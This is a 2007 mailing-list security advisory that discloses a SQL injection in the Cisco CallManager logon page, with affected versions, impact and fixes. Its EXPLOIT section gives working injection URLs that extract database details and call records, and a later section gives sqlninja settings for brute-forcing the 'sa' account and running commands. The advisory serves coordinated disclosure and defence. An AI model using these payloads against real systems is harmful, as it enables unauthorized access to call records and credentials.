--DvifzEOEABd5jzbd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable SUMMARY =3D=3D=3D=3D=3D=3D=3D A SQL injection vulnerability exists in the Log On page of the web interface for Cisco CallManager AKA Unified Communications Manager. An unauthenticated attacker who is able to access the Log On page could exploit this vulnerability to run arbitrary SQL commands as the logged in database user, usually cm_publisher. By running SQL commands, the attacker could gain information about the CallManager configuration, including call records. AFFECTED SOFTWARE =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D * Cisco CallManager prior to v3.3(5)sr2b * Cisco CallManager prior to v4.1(3)sr5 * Cisco CallManager prior to v4.2(3)sr2 * Cisco CallManager prior to v4.3(1)sr1 Note that I have not personally tested these products - I am simply reproducing Cisco's information on the issue. IMPACT =3D=3D=3D=3D=3D=3D An attacker who is able to access the Log On page could harvest a large amount of data about the Cisco VOIP environment - 260 tables in two databases. Depending on the target system's configuration, this data may include sensitive information such as passwords (ccm0306..PilotUser.Password, ccm0306..syspublications.ftp_password, ccm0306..sysusers.password) and call records (cdr..CallDetailRecord.*). The default database user does not appear to have sufficient privileges to perform operations more destructive than simple SELECT statements - no INSERT, UPDATE, DELETE, DROP, etc. It may be possible to use attacks against the exposed MS SQL database in order to expand the impact of this vulnerability - see Advanced Exploitation, below. DETAILS =3D=3D=3D=3D=3D=3D=3D The log on page of the Cisco Unified CallManager web interface performs insufficient checking of the "lang" HTTP GET variable before passing it into a SQL query. By providing a specially crafted lang variable, an attacker could trick the backend MS SQL server into executing arbitrary SQL queries as the logged in user. The affected query returns only a single value, and that value is placed in a Javascript include URL which is not visible in the rendered HTML page. As a result, practical exploitation of this vulnerability can be difficult. Security professionals wishing to test the vulnerability against their own systems may wish to write wrapper code to make running repeated queries less tedious. SOLUTION =3D=3D=3D=3D=3D=3D=3D=3D - Upgrade to an unaffected version of Cisco CallManager - Enable the URLScan ISAPI filter. This filter ships with CCM and restricts the maximum length of form fields, making this vulnerability difficult or impossible to exploit. EXPLOIT =3D=3D=3D=3D=3D=3D=3D To see the returned data from these exploit URLs, view the source of the returned page and look for a line like this: <SCRIPT language=3D"javascript" src=3D"locales/123/userwebdictionary.js"></= SCRIPT> The string "123" is the value returned from the database. Examples: Display the logged-in database user. https://0.0.0.0/CCMUser/logon.asp?lang=3Den'+union+select+CURRENT_USER;sele= ct+tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''=3D' Display the selected database. https://0.0.0.0/CCMUser/logon.asp?lang=3Den'+union+select+db_name();select+= tkUserLocale+from+UserLocaleBrowserLanguageMap+M+where+''=3D' Display the UNIX time at which a call was made from extension 12345. https://0.0.0.0/CCMUser/logon.asp?lang=3Den'+union+select+top+1+convert(cha= r(12),dateTimeOrigination)+from+cdr..CallDetailRecord+where+finalCalledPart= yNumber+%3C%3E+''+and+callingPartyNumber=3D'12345';select+tkUserLocale+from= +UserLocaleBrowserLanguageMap+M+where+''=3D' Display the destination number for that call. Replace "1174900000" with the value from the previous query. https://0.0.0.0/CCMUser/logon.asp?lang=3Den'+union+select+top+1+finalCalled= PartyNumber+from+cdr..CallDetailRecord+where+callingPartyNumber=3D'12345'+a= nd+dateTimeOrigination=3D1174900000;select+tkUserLocale+from+UserLocaleBrow= serLanguageMap+M+where+''=3D' ADVANCED EXPLOITATION =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Several free tools exist to automate attacking SQL injection vulnerabilities like this one. Depending on the configuration of the target server, it may be possible to escalate database privileges or run arbitrary system commands. For example, icesurfer's excellent sqlninja tool (>=3D 0.1.3) can be used to detemine various information about the server hosting the CallManager install, launch a brute-force attack against the database "sa" account password, and run arbitrary commands on the server if the "sa" attack succeeds. http://sqlninja.sourceforge.net/ The following parameters should be specified in the sqlninja.conf file: page =3D /ccmuser/logon.asp stringstart =3D lang=3Den'; stringend =3D select tkUserLocale from UserLocaleBrowserLanguageMap M where= ''=3D' appendcomment =3D no In at least one instance, an unsuccessful brute-force attack against the "sa" password led to denial-of-service conditions on the CallManager server. CREDITS =3D=3D=3D=3D=3D=3D=3D Brandeis University worked with Cisco to release this information in a responsible manner. Cisco has released a Security Advisory on this issue at: http://www.cisco.com/warp/public/707/cisco-sa-20070829-ccm.shtml I would also like to thank icesurfer for his work modifying sqlninja to work with this exploit. REVISION HISTORY =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D 2007-08-30 original release --=20 Elliot Kendall <ekendall@brandeis.edu> Network Security Architect Brandeis University Trouble replying? See http://people.brandeis.edu/~ekendall/sign/ --DvifzEOEABd5jzbd Content-Type: application/x-pkcs7-signature Content-Disposition: attachment; filename="smime.p7s" Content-Transfer-Encoding: base64 MIIItAYJKoZIhvcNAQcCoIIIpTCCCKECAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC BiswggLkMIICTaADAgECAhBggvMqYGnmWTL8QHFRd45JMA0GCSqGSIb3DQEBBQUAMGIxCzAJ BgNVBAYTAlpBMSUwIwYDVQQKExxUaGF3dGUgQ29uc3VsdGluZyAoUHR5KSBMdGQuMSwwKgYD VQQDEyNUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgSXNzdWluZyBDQTAeFw0wNjExMjIxOTA3 MzJaFw0wNzExMjIxOTA3MzJaMEcxHzAdBgNVBAMTFlRoYXd0ZSBGcmVlbWFpbCBNZW1iZXIx JDAiBgkqhkiG9w0BCQEWFWVrZW5kYWxsQGJyYW5kZWlzLmVkdTCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAO9eDtuy41oKi2lWSjfmLhH9Essvghz1h96Hqdh+AYkEz1wEJWG5 ovCDBzrekBdRkXB8vN1p8CV4jfyI2u2Ahrbiv33h45ComeVKMc1lUmMTdICfe5SHzj0+0fK2 G2dUHS6t5CEG2Dy1pZBN3+4dyun3VkkYGJB6IYuvGVxwH8YUw8Dc/SmWBOtLTPjDZ8kZVQyC o+rzDVGFNJVYmjOy9+n0EEgVgNTmgAQGSlWFpR7jnBgjB0ppicKQse9sj/OW33cCHYmcxO85 pYySx+glldHfUiHD2YqNiMOjiBF0n/Q9kLQh/IyzVbRue5efYvwCGSsjb3LBVAHg6JPg+Rcq zpECAwEAAaMyMDAwIAYDVR0RBBkwF4EVZWtlbmRhbGxAYnJhbmRlaXMuZWR1MAwGA1UdEwEB /wQCMAAwDQYJKoZIhvcNAQEFBQADgYEAmZlx5KZcqutjgUk1vgyPtnx/ptHdLo8iHiyVGrSj 5Hc/zl4+QOLHBQU/0NCAkzPQFSl/LUQYsMefBo9enPIY79OUFO9gThclvpr3WmghB+agvVxf Skm4VoxKsWtrBX46FDafeRuCGdRxvR1IhT0sc7Un7Rc1J5OitkVwxegEsj8wggM/MIICqKAD AgECAgENMA0GCSqGSIb3DQEBBQUAMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVy biBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5n MSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtU aGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZy ZWVtYWlsQHRoYXd0ZS5jb20wHhcNMDMwNzE3MDAwMDAwWhcNMTMwNzE2MjM1OTU5WjBiMQsw CQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoG A1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwgZ8wDQYJKoZIhvcN AQEBBQADgY0AMIGJAoGBAMSmPFVzVftOucqZWh5owHUEcJ3f6f+jHuy9zfVb8hp2vX8MOmHy v1HOAdTlUAow1wJjWiyJFXCO3cnwK4Vaqj9xVsuvPAsH5/EfkTYkKhPPK9Xzgnc9A74r/rsY Pge/QIACZNenprufZdHFKlSFD0gEf6e20TxhBEAeZBlyYLf7AgMBAAGjgZQwgZEwEgYDVR0T AQH/BAgwBgEB/wIBADBDBgNVHR8EPDA6MDigNqA0hjJodHRwOi8vY3JsLnRoYXd0ZS5jb20v VGhhd3RlUGVyc29uYWxGcmVlbWFpbENBLmNybDALBgNVHQ8EBAMCAQYwKQYDVR0RBCIwIKQe MBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDItMTM4MA0GCSqGSIb3DQEBBQUAA4GBAEiM0VCD 6gsuzA2jZqxnD3+vrL7CF6FDlpSdf0whuPg2H6otnzYvwPQcUCCTcDz9reFhYsPZOhl+hLGZ GwDFGguCdJ4lUJRix9sncVcljd2pnDmOjCBPZV+V2vf3h9bGCE6u9uo05RAaWzVNd+NWIXiC 3CEZNd4ksdMdRv9dX2VPMYICUTCCAk0CAQEwdjBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMc VGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFs IEZyZWVtYWlsIElzc3VpbmcgQ0ECEGCC8ypgaeZZMvxAcVF3jkkwCQYFKw4DAhoFAKCBsTAY BgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wNzA4MzAxNzA2Mjda MCMGCSqGSIb3DQEJBDEWBBQe/p3w15ntxgTtdg/mXvK/loclDTBSBgkqhkiG9w0BCQ8xRTBD MAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzAN BggqhkiG9w0DAgIBKDANBgkqhkiG9w0BAQEFAASCAQDiPodG3F7hELv3bh/LEhR6aCJna3Mc L5ouTxRvZFg4dMEe3yYxUCXqrYtsBBaSWKN7CAKwfXTsm5ZGQfyqaHR54d8WBFgZeiPSwPVS moo1i6diUqETumutdTMvle+w56EEH+cAnZDwu32QbIFDE4ffuptNSlHmbCXFdLt7aKfKmbBG uJxpuDG3K/KtK9EdOff3Gp5jKzqdpoWz46+MvRKpKvlcVEqnA7c1mjBjcQ5NdypdnQXEbzlg pCkYAwF/GLvKZOd1iWp19jxytSP31+P5JXxdnDn+0+IQfzWglAMZJMegckqzCuYMwmrBI9HS dlqdZIzD33SjQxf0AkJN5yrQ --DvifzEOEABd5jzbd--